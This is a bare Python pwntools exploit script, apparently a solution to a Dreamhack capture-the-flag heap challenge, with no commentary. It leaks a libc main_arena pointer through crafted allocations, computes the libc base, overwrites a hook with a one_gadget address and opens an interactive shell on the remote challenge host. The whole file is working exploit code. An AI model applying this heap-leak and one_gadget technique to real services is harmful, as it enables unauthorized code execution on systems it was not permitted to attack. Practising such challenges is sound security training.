from pwn import *
og = 0x10a41c
h1 = 0x500
p = remote("host3.dreamhack.games",20419)
def z(a): return str(a)
def s(a,b): p.sendafter(a,b)
def sl(a,b): p.sendlineafter(a,b)
def h(w,a): sl(b">","1");sl(b": ",z(w));sl(b": ",z(a))
def r(): sl(b">","2");sl(b": ",z(1));
def c(t,d,i): sl(b"> ","3");sl(b": ",z(t));s(b": ",d);sl(b": ",z(i))
c(h1, b"A", -1)
c(h1, b"A", -1)
c(h1, b"A", 0)
c(h1, b"B", -1)
libc_main_arena = u64(p.recvline()[:-1].ljust(8,b'\x00'))
libc_base = libc_main_arena - 0x3ebc42
print("[1] libc base : ", hex(libc_base))
print("[2] main_arena : ", hex(libc_main_arena))
h(1,libc_base+og)
r()
p.interactive()
